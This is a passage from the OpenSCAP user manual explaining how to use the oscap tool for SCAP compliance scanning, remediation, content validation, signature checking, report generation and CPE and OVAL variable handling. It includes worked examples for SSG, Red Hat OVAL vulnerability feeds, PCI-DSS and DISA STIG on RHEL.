match DISA's, you can use the `--stig-viewer` command-line argument along with
a special reference in your Rules to generate XCCDF result files that can be imported by
DISA STIG Viewer.

--------------------------------------------------------------------------------------
$ oscap xccdf eval --profile stig-rhel7-disa --stig-viewer results-stig.xml ssg-rhel7-ds.xml
--------------------------------------------------------------------------------------

Each rule in the input XCCDF must contain a reference to its STIG Rule ID, and its
href attribute must be exactly `http://iase.disa.mil/stigs/Pages/stig-viewing-guidance.aspx`.

For example:
----
<Rule id="rpm_verify_permissions">
 ...
 <reference href="http://iase.disa.mil/stigs/Pages/stig-viewing-guidance.aspx">SV-86473r2_rule</reference>
 ...
</Rule>
----

For more information on DISA STIG Viewer click link:http://iase.disa.mil/stigs/Pages/stig-viewing-guidance.aspx[here].

=== Remediate System
OpenSCAP allows you to automatically remediate systems that have been found in a
non-compliant state. For system remediation, an XCCDF file with instructions is
required. The _scap-security-guide_ package contains certain remediation
instructions.

System remediation consists of the following steps:

 . `oscap` performs a regular XCCDF evaluation.
 . An assessment of the results is performed by evaluating the OVAL definitions.
 Each rule that has failed is marked as a candidate for remediation.
 . `oscap` searches for an appropriate fix element, resolves it, prepares the
 environment, and executes the fix script.
 . Any output of the fix script is captured by `oscap` and stored within the
 *rule-result* element. The return value of the fix script is stored as well.
 . Whenever `oscap` executes a fix script, it immediately evaluates the OVAL
 definition again (to verify that the fix script has been applied correctly).
 During this second run, if the OVAL evaluation returns success, the result of
 the rule is *fixed*, otherwise it is an *error*.
 . Detailed results of the remediation are stored in an output XCCDF file. It
 contains two *TestResult* elements. The first *TestResult* element represents the
 scan prior to the remediation. The second *TestResult* is derived from the first
 one and contains remediation results.

There are three modes of operation of `oscap` with regard to remediation:
online, offline, and review.

==== Online Remediation
Online remediation executes fix elements at the time of scanning. Evaluation and
remediation are performed as a part of a single command.

To enable online remediation, use the `--remediate` command-line option.
For
example, to execute online remediation using the _scap-security-guide_ package,
run:

----
$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

The output of this command consists of two sections. The first section shows the
result of the scan prior to the remediation, and the second section shows the
result of the scan after applying the remediation. The second part can contain
only *fixed* and *error* results. The *fixed* result indicates that the scan performed
after the remediation passed. The *error* result indicates that even after
applying the remediation, the evaluation still does not pass.

==== Offline Remediation
Offline remediation allows you to postpone fix execution. In the first step, the
system is only evaluated, and the results are stored in a *TestResult* element in
an XCCDF file.

In the second step, `oscap` executes the fix scripts and verifies the result. It
is safe to store the results in the input file; no data will be lost. During
offline remediation, a new *TestResult* element is created that is based
on the input one and inherits all the data. The newly created *TestResult*
differs only in the *rule-result* elements that have failed. For those,
remediation is executed.

To perform offline remediation using the _scap-security-guide_ package, run:

----
$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----
----
$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml
----

==== Remediation Review
The review mode allows users to store remediation instructions to a file for
further review. The remediation content is not executed during this operation.
To generate remediation instructions in the form of a shell script, run:

----
$ oscap xccdf generate fix \
--fix-type bash \
--profile xccdf_org.ssgproject.content_profile_rht-ccp \
--output my-remediation-script.sh \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----
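
Recent OpenSCAP releases also accept other values for `--fix-type`, such as
`ansible` for generating an Ansible playbook; see `man oscap` for the fix types
supported by your version. A hypothetical invocation might look like this:

----
# assumes your oscap build supports --fix-type ansible
$ oscap xccdf generate fix \
--fix-type ansible \
--profile xccdf_org.ssgproject.content_profile_rht-ccp \
--output my-remediation-playbook.yml \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----
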
=== Check Engines
Most XCCDF content uses the OVAL check engine. This means that OVAL
Definitions are evaluated in order to assess the system. Complete
information about an evaluation is recorded in OVAL Results files, as
defined by the OVAL specification. By examining these files it's
possible to check which definitions were used for the evaluation and why the
results are as they are. Please note these files are not generated
unless *--oval-results* is used.

Some content may use alternative check engines, for example the
{sce_web}[SCE] check engine.

Results of rules with a check that requires a check engine not supported
by OpenSCAP will be reported as *notchecked*. Check contents are not
read or interpreted in any way unless the check system is known and
supported. Following is an evaluation output of an XCCDF with an unknown
check system:

--------------------------------------------------------
$ oscap xccdf eval sds-datastream.xml

Title Check group file contents
Rule xccdf_org.example_rule_system_authcontent-group
Result notchecked

Title Check password file contents
Rule xccdf_org.example_rule_system_authcontent-passwd
Result notchecked

Title Check shadow file contents
Rule xccdf_org.example_rule_system_authcontent-shadow
Result notchecked

...
--------------------------------------------------------

NOTE: The *notchecked* result is also reported for rules that have no
check implemented. *notchecked* means that there was no check in that
particular rule that could be evaluated.

==== CVE, CCE, CPE and other identifiers
Each XCCDF Rule can have xccdf:ident elements inside. These elements
allow the content creator to reference various external identifiers like
CVE, CCE, CPE and others.

When scanning, `oscap` outputs the identifiers of scanned rules regardless of
their results. For example:

------------------------------------------------------------------------
Title Ensure Repodata Signature Checking is Not Disabled For Any Repos
Rule rule-2.1.2.3.6.a
Result pass

Title Verify user who owns 'shadow' file
Rule rule-2.2.3.1.a
Ident CCE-3918-0
Result pass

Title Verify group who owns 'shadow' file
Rule rule-2.2.3.1.b
Ident CCE-3988-3
Result pass
------------------------------------------------------------------------

All identifiers (if any) are printed to stdout for each rule. Since
standard output doesn't allow for compact identifier metadata to be
displayed, only the identifiers themselves are displayed there.
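
If you only need a quick list of the identifiers touched by a scan, the
standard output can be filtered with ordinary shell tools. A rough sketch,
assuming the output layout shown above:

----
$ oscap xccdf eval --profile Desktop scap-xccdf.xml | grep '^Ident'
----
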
Identifiers are also part of the HTML report output. If the identifier
is a CVE you can click it to display its metadata from the official NVD
database (requires internet connection). OpenSCAP doesn't provide
metadata for other types of identifiers.

Another place where these identifiers can be found is a machine-readable
Result DataStream file. This file can be generated during the scan by adding
the *--results-arf* option.

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--fetch-remote-resources --results-arf results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

The result data stream file **results.xml** contains these identifiers in <rule-result>
elements.

----
<rule-result
 idref="xccdf_org.ssgproject.content_rule_partition_for_tmp"
 time="2017-01-20T14:30:18" severity="low" weight="1.000000">
 <result>pass</result>
 <ident system="https://nvd.nist.gov/cce/index.cfm">CCE-27173-4</ident>
 <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
 <check-content-ref name="oval:ssg-partition_for_tmp:def:1" href="#oval0"/>
 </check>
</rule-result>
----

Since OpenSCAP 1.2.9 you can use the Group-By feature of the HTML report
to get an overview of results based on their identifiers and references.

The HTML report can also be used to look up Rules by their identifiers.
You can type the identifier (e.g. CCE-27173-4) in the search box in
the HTML report and only rules with this identifier will be shown.
This can be used for any type of XCCDF identifier or reference.
You can also click on the rule title to show more details and see all
its identifiers, including the identifier you looked for.
This relies heavily on SCAP content quality; if the identifiers are
not present in the source content, they will not be available in the
HTML report.

If you want to map two identifiers -- e.g. map a CCE identifier to
a NIST 800-53 identifier -- you need to look up the CCE ID in the
HTML report through the search box using the first identifier. Then,
by grouping by NIST SP 800-53 ID, you can see all NIST 800-53 IDs
related to the searched CCE ID.

==== Bundled CCE data
OpenSCAP does not provide any static or product bundled CCE data. Thus
it has no way of displaying the last generated, updated and officially
published dates of static or product bundled CCE data because the dates
are not defined.

==== Scanning with Script Check Engine (SCE)
The Script Check Engine (SCE) is an alternative check engine for XCCDF checklist
evaluation. SCE allows you to call shell scripts out of the XCCDF document.
This approach might be suitable for various use cases, mostly when OVAL checks
are not required. More information about SCE usage is available on this page:
{sce_web}[Using SCE].

WARNING: SCE is not part of any SCAP specification.

== Advanced oscap usage

=== Validating SCAP Content
Before you start using a security policy on your systems, you should first
verify the policy in order to avoid any possible syntax or semantic errors in
the policy. The `oscap` tool can be used to validate the security content
against standard SCAP XML schemas. The validation results are printed to the
standard error stream (stderr). The general syntax of such a validation command
is the following:

----
$ oscap module validate [module_options_and_arguments] file
----

where file is the full path to the file being validated. As a `module` you
can use:

 * xccdf,
 * oval,
 * cpe, or
 * cve.
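
For example, to validate an XCCDF document (the file name is only a
placeholder):

----
$ oscap xccdf validate xccdf-file.xml
----
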
The only exception is the data stream module (ds), which uses the sds-validate
operation instead of validate. For example:

----
$ oscap ds sds-validate scap-ds.xml
----

NOTE: All SCAP components within the given data stream are validated
automatically and none of the components is specified separately.

You can also enable extra Schematron-based validation when validating OVAL
content. This validation method is slower but it provides deeper analysis.
Run the following command to validate an OVAL document using Schematron:

----
$ oscap oval validate --schematron oval-file.xml
----

The results of validation are printed to the standard error stream (stderr).

NOTE: Please note that for the rest of `oscap` functionality, unless you specify
`--skip-valid`, validation will automatically occur before files are used.
Therefore, you do not need to explicitly validate a datastream before
use.

=== SCAP Content Signing and Signature Verification
The `oscap` tool itself does not do signature verification. It skips over the
respective elements. This is because there are far too many options
when it comes to keystores and crypto choices. Instead, we recommend that users
use {xmlsec}[xmlsec1] to verify their SCAP content. Safely evaluating signed
content (with signature verification) involves the following steps:

1) Install xmlsec1 and at least one of its crypto engines:
-------------------------------------
# yum install xmlsec1 xmlsec1-openssl
-------------------------------------

2) Run `xmlsec1 --verify` on the content:

This simple example will only show two specific cases of verifying the
signature; the steps may vary depending on which technique was used to
sign the datastream.

Assuming the datastream was signed with a private key and we have the
respective public key to verify it with:

------------------------------------------------------
$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml
------------------------------------------------------

Assuming the datastream was signed with a certificate and we have the
respective public part of the certificate to verify it with:

---------------------------------------------------------------
$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml
---------------------------------------------------------------

There are countless other options; for more details see `xmlsec1
--help-verify`.

Successful output should look similar to this:

-----------------------------------------------------
$ xmlsec1 verify --pubkey-pem key.pub datastream.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0
-----------------------------------------------------

And the exit code must be 0 before proceeding.

3) If the previous steps resulted in successful verification, proceed
by evaluating the datastream:

---------------------------------
$ oscap xccdf eval datastream.xml
---------------------------------

NOTE: If you want to experiment with various crypto engines of xmlsec1, see
`xmlsec1-config --help`.

=== Generating Reports and Guides
Another useful feature of `oscap` is the ability to generate SCAP content in a
human-readable format. It allows you to transform an XML file
into HTML or plain-text format. This feature is used to generate security
guides and checklists, which serve as a source of information, as well as
guidance for secure system configuration. The results of system scans can also
be transformed to well-readable result reports.
The general command syntax is
the following:

----
oscap module generate sub-module [specific_module/sub-module_options_and_arguments] file
----

where module is either `xccdf` or `oval`, `sub-module` is a type of
the generated document, and file represents an XCCDF or OVAL file. A sub-module
can be either `report`, `guide`, `custom` or `fix`. Please see
`man oscap` for more details.

=== Content Transformation
The oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet
Language Transformations) language, which allows transformation of a SCAP
content XML file into another XML, HTML, plain text or {xsl}[XSL] document.
This feature is very useful when you need the SCAP document in a
human-readable form. The following commands represent the most common
cases:

* Creating a guide (see an
https://static.open-scap.org/examples/guide.html[example]):
--------------------------------------------------------
$ oscap xccdf generate guide scap-xccdf.xml > guide.html
--------------------------------------------------------

* Creating a guide with a profile checklist (see an
https://static.open-scap.org/examples/guide-checklist.html[example]):
------------------------------------------------------------------------------------
$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html
------------------------------------------------------------------------------------

* Generating the XCCDF scan report (see an
https://static.open-scap.org/examples/report-xccdf.html[example]):
-------------------------------------------------------------------
$ oscap xccdf generate report xccdf-results.xml > report-xccdf.html
-------------------------------------------------------------------

* Generating the OVAL scan report (see an
https://static.open-scap.org/examples/report-oval.html[example]):
----------------------------------------------------------------
$ oscap oval generate report oval-results.xml > report-oval.html
----------------------------------------------------------------

* Generating the XCCDF report with additional information from failed
OVAL tests (see an
https://static.open-scap.org/examples/report-xccdf-oval.html[example]):
----
$ oscap xccdf generate report \
--oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html
----

=== CPE applicability
XCCDF rules in the content may target only specific platforms and hold
no meaning on other platforms. Such an XCCDF rule contains an
*<xccdf:platform>* element in its body. This element references a CPE
name or a CPE2 platform (defined using **cpe2:platform-specification**),
which can be defined in a CPE dictionary file or a CPE language file,
or can be embedded directly in the XCCDF document.

An XCCDF rule can contain multiple *<xccdf:platform>* elements. It is
deemed applicable if at least one of the listed platforms is applicable.
If an XCCDF rule contains no *<xccdf:platform>* elements, it is considered
always applicable.
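
For illustration, a rule restricted to a single platform might look like the
following snippet (the CPE name and the IDs here are made up):

----
<!-- illustrative example; IDs and CPE name are not from real content -->
<Rule id="xccdf_com.example.www_rule_1" selected="true">
  <platform idref="cpe:/o:example:os:1.0"/>
  <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
    <check-content-ref href="my-test-oval.xml" name="oval:com.example.www:def:1"/>
  </check>
</Rule>
----
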
If the CPE name or CPE2 platform is defined in an external file, use the
`--cpe` option; `oscap` auto-detects the format of the file. The following
command is an example of evaluating XCCDF content using a CPE name
from an external file:

-----------------------------------------------------------------------------------------
$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml
-----------------------------------------------------------------------------------------

Where *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file
containing the scan results, and *external-cpe-file.xml* is the CPE
dictionary or a language file.

If you are evaluating a source data stream, `oscap` automatically
registers all CPEs contained within the data stream. No extra steps have
to be taken. You can also register an additional external CPE file, as
shown by the command below:

----
$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml
----

Where *scap-ds.xml* is a file representing the SCAP data stream
collection, *ds.xml* is the particular data stream, *xccdf.xml* is the
XCCDF document, *xccdf-results.xml* is a file containing the scan
results, and *additional-external-cpe.xml* is the additional CPE
dictionary or language file.

The `oscap` tool will use an OVAL file attached to the CPE dictionary to
determine applicability of any CPE name in the dictionary.

Apart from the instructions above, no extra steps have to be taken for
content using *cpe:fact-ref* or **cpe2:fact-ref**. See the following
sections for details on resolving.

==== xccdf:platform applicability resolution

When a CPE name or language model platform is referenced via
*<xccdf:platform>* elements, resolution happens in the following order:

 . Look into the embedded CPE2 language model; if the name is found and
 applicable, deem it applicable
 . If not found or not applicable, look into external CPE2 language models
 (order of registration)
 . If not found or not applicable, look into the embedded CPE dictionary
 . If not found or not applicable, look into external CPE dictionaries (order of
 registration)

If the CPE name is not found in any of the sources, it is deemed not
applicable. If it is found in any of the sources but not applicable, we
look for it elsewhere.

==== cpe:fact-ref and cpe2:fact-ref resolution

A CPE name referenced from within a fact-ref is resolved in the following
order:

. Look into the embedded CPE dictionary; if the name is found and applicable,
deem it applicable
. If not found or not applicable, look into external CPE dictionaries
(order of registration)

==== Built-in CPE Naming Dictionary

Apart from the external CPE Dictionaries, `oscap` comes with a built-in
CPE Dictionary. The built-in CPE Dictionary contains only a few products
(a subset of the http://nvd.nist.gov/cpe.cfm[Official CPE Dictionary]) and it
is used as a fall-back option when there is no other CPE source found.

The list of built-in CPE names can be found in the output of:

-----------------
$ oscap --version
-----------------

You can file a request to include any additional product in the built-in
dictionary via the https://www.redhat.com/mailman/listinfo/open-scap-list[open-scap
mailing list] or
https://bugzilla.redhat.com/enter_bug.cgi?product=Fedora[Bugzilla].

=== Notes on the Concept of Multiple OVAL Values
This section describes advanced concepts of OVAL Variables and their
implementation in `oscap`.
The SCAP specification allows for an OVAL
variable to have multiple values during a single assessment run. There
are two variable modes, which can be combined:

* Multival -- A variable is assigned multiple values at the same
time. As an example, consider a variable which refers to the preferred
permissions of a given file, which may take multiple values like '600' and
'400'. The evaluation tries to match each (or all) and then outputs a
single OVAL Definition result.
* Multiset -- A variable is assigned a different value (or
multival) for different evaluations. This is known as a
*variable_instance*. As an example, consider an OVAL definition which
checks that a package given by a variable is not installed. For the first
evaluation of the definition, the variable can be assigned the
'telnet-server' value; for the second, the variable can be assigned the
'tftp-server' value. Therefore, both evaluations may output different
results. Thus, the OVAL Results file may contain multiple results for
the same definition; these are distinguished by the *variable_instance*
attribute.

These two concepts are a source of confusion for both content
authors and result consumers. On one hand, the first concept is well
supported by the standard and the OVAL Variables file format. It allows
multiple *<value>* elements for each *<variable>* element. On the other
hand, the second concept is not supported by the OVAL Variables schema,
which prevents fully automated evaluation of multisets (unless you
use XCCDF to bridge that gap).

TIP: `oscap` supports both variable modes, as described below.

==== Sources of Variable Values
First we need to understand how a single value can be bound to a
variable in the OVAL checking engine. There are three ways to do this:

1) OVAL Variables File -- The values of external variables can be
defined in an external file. Such a file is called an OVAL Variables file
and can be recognized by using the following command: `oscap info
file.xml`. The OVAL Variables file can be passed to the evaluation by
the `--variables` argument, such as:
----
$ oscap oval eval \
--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \
--results usgcb-results-oval.xml \
usgcb-rhel5desktop-oval.xml
----

2) XCCDF Bindings -- The values of external variables can be given from
an XCCDF file. In the XCCDF file, within each *<xccdf:check>* element,
there might be *<xccdf:check-export>* elements. These elements allow the
transfer of *<xccdf:value>* elements to *<oval:variables>* elements. The
following command allows users to export variable bindings from XCCDF to
an OVAL Variables file:
----
$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml
----

3) Values within an OVAL Definition File -- Variable values can be defined
directly in the OVAL definitions file, in *<constant_variable>* and
*<local_variable>* elements.
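As a minimal sketch of the third option (the variable ID, value, and comment
are illustrative only, not taken from any shipped content), such an embedded
variable could look like this:

----
<constant_variable id="oval:com.example.www:var:2" version="1"
    datatype="string" comment="Preferred permission of the file">
  <value>600</value>
</constant_variable>
----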
==== Evaluation of Multiple OVAL Values
With `oscap`, there are two possible ways to specify two or more values
for a variable used by one OVAL definition. The approach you choose
depends on which mode you want to use, multival or multiset.

`oscap` handles multiple OVAL values seamlessly. Users don't need to do
anything differently than for a normal scan.
The command below demonstrates evaluation of a DataStream, which may include
the multiset concept, the multival concept, both combined, or neither.
----
$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml
----

==== Multival
Multival can pass multiple values to a single OVAL definition
evaluation. This can be accomplished in all three ways described in the
previous section.

1) OVAL Variables file -- This option is straightforward. The file
format (XSD schema) allows for multiple *<value>* elements within each
*<variable>* element.

----
<variable id="oval:com.example.www:var:1" datatype="string" comment="Unknown">
  <value>600</value>
  <value>400</value>
</variable>
----

2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* elements referring to the
very same OVAL variable, bound to multiple different XCCDF values.
----
<check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
  <check-export value-id="xccdf_com.example.www_value_1"
      export-name="oval:com.example.www:var:1"/>
  <check-export value-id="xccdf_com.example.www_value_2"
      export-name="oval:com.example.www:var:1"/>
  <check-content-ref href="my-test-oval.xml" name="oval:com.example.www:def:1"/>
</check>
----

3) Values within an OVAL Definitions file -- This is similar to using a
Variables file; multiple *<value>* elements are allowed within
*<constant_variable>* or *<local_variable>* elements.

==== Multiset
Multiset allows for the very same OVAL definition to be evaluated
multiple times using different values assigned to the variables for each
evaluation. In OpenSCAP, this is only possible via option (2), XCCDF
Bindings. The following XCCDF snippet evaluates the very same OVAL
definition twice; each time it binds a different value to the OVAL variable.

----
<Rule id="xccdf_moc.elpmaxe.www_rule_1" selected="true">
  <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
    <check-export value-id="xccdf_moc.elpmaxe.www_value_1" export-name="oval:com.example.www:var:1"/>
    <check-content-ref href="my-test-oval.xml" name="oval:com.example.www:def:1"/>
  </check>
</Rule>
<Rule id="xccdf_moc.elpmaxe.www_rule_2" selected="true">
  <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
    <check-export value-id="xccdf_moc.elpmaxe.www_value_2" export-name="oval:com.example.www:var:1"/>
    <check-content-ref href="my-test-oval.xml" name="oval:com.example.www:def:1"/>
  </check>
</Rule>
----

After the evaluation, the OVAL results file will contain multiple
result-definitions, multiple result-tests and multiple
collected-objects. Elements with the same id will be differentiated by
the value of the *variable_instance* attribute.
Each of the
definitions/tests/objects might have a different evaluation result.
The following snippet of an OVAL results file illustrates the output of a
multiset evaluation.

----
<tests>
  <test test_id="oval:com.example.www:tst:1" version="1"
      check="at least one" result="true" variable_instance="1">
    <tested_item item_id="1117551" result="true"/>
    <tested_variable variable_id="oval:com.example.www:var:1">600</tested_variable>
  </test>
  <test test_id="oval:com.example.www:tst:1" version="1"
      check="at least one" result="false" variable_instance="2">
    <tested_item item_id="1117551" result="false"/>
    <tested_variable variable_id="oval:com.example.www:var:1">400</tested_variable>
  </test>
</tests>
----



=== External or remote resources
Some SCAP content references external resources. For example, SCAP Security Guide
uses an external OVAL file to check that the system is up to date and has no known
security vulnerabilities. Other content can use external resources for
other purposes.

When you are evaluating SCAP content with external resources, the `oscap` tool
will warn you:

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml

WARNING: This content points out to the remote resources. Use `--fetch-remote-resources' option to download them.
WARNING: Skipping https://www.redhat.com/security/data/oval/com.redhat.rhsa-RHEL7.xml.bz2 file which is referenced from XCCDF content
----

By default, the `oscap` tool will not blindly download and execute remote content.
If you trust your local content and the remote content it references, you can use
the `--fetch-remote-resources` option to automatically download it using the
`oscap` tool.

----
$ oscap xccdf eval \
--fetch-remote-resources \
--profile xccdf_org.ssgproject.content_profile_common \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
Downloading: https://www.redhat.com/security/data/oval/com.redhat.rhsa-RHEL7.xml.bz2 ... ok
Title Ensure /var/log Located On Separate Partition
Rule xccdf_org.ssgproject.content_rule_partition_for_var_log
...
----


=== Evaluating XCCDF rules with multiple checks

Normally, each XCCDF rule references a single check with a specified name.
However, if the `@name` attribute of `xccdf:check-content-ref` of a given rule is omitted,
multiple checks can be executed to evaluate the rule.
This is common for the `security_patches_up_to_date` check.
By default, only a single result is produced for an XCCDF rule in such a case, and the
result is computed from all results of checks in the referenced location.
If the user wants to see separate results for each check (one `xccdf:check-result` element
in the results document for each check evaluated), the `multi-check` attribute
of the `xccdf:check` element must be set to *true*.

----
<Rule
    id="xccdf_org.nist-testsuite.content_rule_security_patches_up_to_date"
    selected="false" weight="10.0">
  <title xml:lang="en-US">Security Patches Up-To-Date</title>
  <description xml:lang="en-US">All known security patches have been installed.</description>
  <requires idref="xccdf_org.nist-testsuite.content_group_CM-6"/>
  <requires idref="xccdf_org.nist-testsuite.content_group_SI-2"/>
  <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5" multi-check="true">
    <check-content-ref href="r1100-scap11-win_rhel-patches.xml"/>
  </check>
</Rule>
----

In XCCDF specifications older than 1.2, the `multi-check` attribute is not defined,
which means that only a single result is always produced.
To produce separate results for each check from content older than XCCDF version 1.2,
you need to convert it first into XCCDF 1.2 using the following command:

----
$ xsltproc --stringparam reverse_DNS com.example.www /usr/share/openscap/xsl/xccdf_1.1_to_1.2.xsl xccdf.xml > xccdf-1.2.xml
----

Then patch the content using a text editor, adding `multi-check` as
shown in the example Rule snippet above.

To create a source DataStream from the patched content, the following command can be used:

----
$ oscap ds sds-compose xccdf-1.2.xml source_ds.xml
----

If the original XCCDF file referenced a custom CPE dictionary, you also have to inject
the CPE dictionary into the DataStream in order to create a valid source DataStream.
To add a CPE dictionary component into your DataStream in place, use this command:

----
$ oscap ds sds-add cpe_dictionary.xml source_ds.xml
----

Now the `source_ds.xml` DataStream can be evaluated as usual.
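For instance, a plain evaluation of the patched DataStream could look like
this (a routine `oscap xccdf eval` invocation; the result file name is just
an example):

----
$ oscap xccdf eval --results results.xml source_ds.xml
----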
== Practical Examples
This section demonstrates practical usage of certain security content provided
for Red Hat products.

These practical examples show usage of industry standard checklists that
were validated by NIST.

=== Auditing System Settings with SCAP Security Guide
The SSG project contains guidance for settings of Red Hat Enterprise Linux 7.

1) Install the SSG

----
$ sudo yum install -y scap-security-guide
----

2) To inspect the security content, use the `oscap info` module:

----
$ oscap info /usr/share/xml/scap/ssg/rhel7/ssg-rhel7-ds.xml
----

The output of this command contains the available configuration profiles. To audit
your system settings, choose the
`xccdf_org.ssgproject.content_profile_rht-ccp` profile and run the
evaluation command. For example, the following command is used to assess
the given system against a draft SCAP profile for Red Hat Certified Cloud
Providers:

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_rht-ccp \
--results ssg-rhel7-xccdf-result.xml \
--report ssg-rhel7-report.html \
/usr/share/xml/scap/ssg/rhel7/ssg-rhel7-ds.xml
----


=== Auditing Security Vulnerabilities of Red Hat Products
The Red Hat Security Response Team provides OVAL definitions for all
vulnerabilities (identified by CVE name) that affect Red Hat Enterprise
Linux 3, 4, 5, 6 and 7. This enables users to perform a vulnerability scan
and diagnose whether the system is vulnerable or not. The data is provided in
three forms -- a plain OVAL file, OVAL + XCCDF, and a Source DataStream.

==== OVAL + XCCDF

1) Download the content
----
$ wget https://www.redhat.com/security/data/metrics/com.redhat.rhsa-all.xccdf.xml
$ wget https://www.redhat.com/security/data/oval/com.redhat.rhsa-all.xml
----

2) Run the scan
----
$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml
----

This is a sample output. It reports that the Red Hat Security
Advisory RHSA-2013:0911 was issued but the update was not applied, so the
system is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,
CVE-2013-2017):

----
Title   RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)
Rule    oval-com.redhat.rhsa-def-20130911
Ident   CVE-2013-1935
Ident   CVE-2013-1943
Ident   CVE-2013-2017
Result  fail
----

A human-readable report *report.html* is generated, as well as a machine-readable
report **results.xml**. Both files hold information about the
vulnerability status of the scanned system. They map RHSA to CVEs and report
which security advisories are not applied to the scanned system. CVE identifiers
are linked with the National Vulnerability Database, where additional information
like the CVE description, CVSS score, CVSS vector, etc. is stored.

==== OVAL only

1) Download the content
----
$ wget https://www.redhat.com/security/data/oval/com.redhat.rhsa-all.xml
----

2) Run the scan
----
$ oscap oval eval --results results.xml --report report.html com.redhat.rhsa-all.xml
----

This is a sample output.
It reports that the Red Hat Security
Advisory RHSA-2013:0911 was issued but the update was not applied.
Notice that the standard output is different from the XCCDF + OVAL output.

----
Definition oval:com.redhat.rhsa:def:20130911: true
----

As in the case of XCCDF + OVAL, a human-readable report *report.html* and a
machine-readable report **results.xml** are generated. The look of *report.html*
is different from the one generated when an XCCDF checklist is used as the basis
for the scan, but it again holds information about the vulnerability status of the
scanned system and the mapping of RHSA to CVEs. CVE identifiers are linked with the
Red Hat database, where additional information like the CVE description, CVSS score,
CVSS vector, etc. is stored.


==== Source DataStream
The Source DataStream use-case is very similar to OVAL + XCCDF. The only
difference is that you don't have to download two separate files.

1) Download the content

----
$ wget https://www.redhat.com/security/data/metrics/ds/com.redhat.rhsa-all.ds.xml
----

2) Run the scan

----
$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.ds.xml
----


==== More Specialized Files

The files we used above cover multiple Red Hat products. If you only want to
scan one product -- for example a specific version of Red Hat Enterprise Linux --
we advise downloading a smaller specialized file covering just this one version.
Using a smaller file will use less bandwidth and make the evaluation
quicker.

For example, for Red Hat Enterprise Linux 7 the plain OVAL file is located at:

----
$ wget https://www.redhat.com/security/data/oval/Red_Hat_Enterprise_Linux_7.xml
----

You can get a list of all the plain OVAL files by visiting
https://www.redhat.com/security/data/oval/

The list of available datastream files is available at
https://www.redhat.com/security/data/metrics/ds/
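The specialized file is then evaluated in the same way as the all-products
file above (the result and report file names here are just examples):

----
$ oscap oval eval --results rhel7-results.xml --report rhel7-report.html Red_Hat_Enterprise_Linux_7.xml
----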
==== Disclaimer
NOTE: These OVAL definitions are designed to cover only software and
updates released by Red Hat. You need to provide additional definitions in order
to detect the patch status of third-party software.

To find out more information about this project, see
https://www.redhat.com/security/data/metrics/.


=== How to Evaluate PCI-DSS on RHEL7
This section describes how to evaluate the Payment Card Industry Data Security
Standard (PCI-DSS) on Red Hat Enterprise Linux 7.

1) Install SSG, which provides the PCI-DSS SCAP content

----
$ sudo yum install -y scap-security-guide
----

2) Verify that the PCI-DSS profile is present

----
$ oscap info /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

3) Evaluate the PCI-DSS content

----
$ oscap xccdf eval \
--results results.xml \
--profile xccdf_org.ssgproject.content_profile_pci-dss \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

4) Generate a report readable in a web browser.

----
$ oscap xccdf generate report --output report.html results.xml
----

=== How to Evaluate DISA STIG
This section describes how to evaluate the Defense Information Systems Agency
(DISA) Security Technical Implementation Guide (STIG) on Red Hat Enterprise
Linux 6.

1) Download the DISA STIG content.
----
$ wget http://iasecontent.disa.mil/stigs/zip/July2015/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip
----

2) Unpack the content.
----
$ unzip U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip
----

3) Fix the content using a sed substitution.
----
$ sed -i 's/<Group\ \(.*\)/<Group\ selected="false"\ \1/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml
----

NOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF
specification 1.2], the `selected` attribute of a *Rule* or *Group* is *true* by default.
This means that if you create a new profile, even with only one rule selected, all
rules within the benchmark will be evaluated, because they are selected by default. The
substitution sets all Groups as unselected by default, which means all their
descendants will also be unselected by default.
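To illustrate the effect of the substitution (the Group ID below is a made-up
example), an element such as

----
<Group id="V-38437">
----

becomes

----
<Group selected="false" id="V-38437">
----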
